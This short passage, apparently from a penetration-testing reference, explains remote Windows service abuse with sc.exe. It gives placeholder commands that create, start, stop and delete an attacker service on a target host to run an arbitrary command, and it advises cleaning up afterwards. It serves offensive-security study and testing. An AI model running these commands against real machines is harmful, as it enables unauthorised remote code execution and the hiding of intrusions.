IMPORTANT
By default, UAC restricts remote sc.exe calls to domain admins and the default local “Administrator” account. Local Windows admins cannot call this service remotely without first disabling UAC!
The sc.exe command can also be used to create and manipulate services on remote machines. This uses the Windows RPC (TCP 135), but will fall back to named pipes over SMB (TCP 445) or NetBIOS (TCP 139). (In fact, this is how sc.exe works locally as well; the only difference is that in this case a local named pipe is always used.)
# Create $ATTACKER_SERVICE on the $TARGET_HOST.
#
sc.exe \\$TARGET_HOST create $ATTACKER_SERVICE `
binPath= "$SOME_COMMAND" start= auto
# Invoke $ATTACKER_SERVICE.
#
sc.exe \\$TARGET_HOST start $ATTACKER_SERVICE
# Make sure that $ATTACKER_SERVICE is really dead.
#
sc.exe \\$TARGET_HOST stop $ATTACKER_SERVICE
# Clean up after yourself.
#
sc.exe \\$TARGET_HOST delete $ATTACKER_SERVICENote that this is a blind attack — there will be no output indicating success or failure.